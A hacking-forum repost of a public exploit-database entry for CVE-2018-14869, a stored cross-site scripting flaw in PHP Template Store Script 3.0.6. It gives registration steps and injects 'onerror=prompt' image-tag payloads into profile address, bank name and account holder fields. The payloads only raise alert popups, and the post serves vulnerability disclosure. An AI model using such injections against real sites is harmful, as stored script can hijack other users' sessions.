跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

PHP Template Store Script 3.0.6 - Cross-Site Scripting

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
*******************************************************************************************
# Exploit Title:  PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name 
# Date: 02.08.2018
# Site Titel : Exclusive Scripts
# Vendor Homepage:  https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/
# Category: Web Application
# Version: 3.0.6
# Exploit Author: Sarafraz Khan
# Contact: https://www.facebook.com/sarfraj.khan.79
# Web:  https://goglequeens.com
# Tested on: Windows 10 -Firefox
# CVE-2018-14869
*****************************************************************************************
 
Proof of Concept:-
--------------------------
1. Go  to the  site ( http://www.server.com/ ) .
2- Click on => Login => Register => and then fill the Form and click on Register Now
3-Goto your mail and Verify it.
4-Now come back to site and Sign in  using your  Verified mail and Password.
5-Goto Setting => Personal information  and paste these code in 
    Address line 1 =>         "><img src=x onerror=prompt(/SARAFRAZ/)>
    Address Line 2 =>        "><img src=x onerror=prompt(/KHAN/)>
     Bank name  =>            "><img src=x onerror=prompt(/KING/)>
    A/C Holder name =>     "><img src=x onerror=prompt(/GOOGLEQUEENS/)>

  and then click on Update Profile.

6-Now You will having popup of /SARAFRAZ/  ,  /KHAN/ , / KING/ and /GOOGLEQUEENS/  in you account..

***************************************************************************************

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。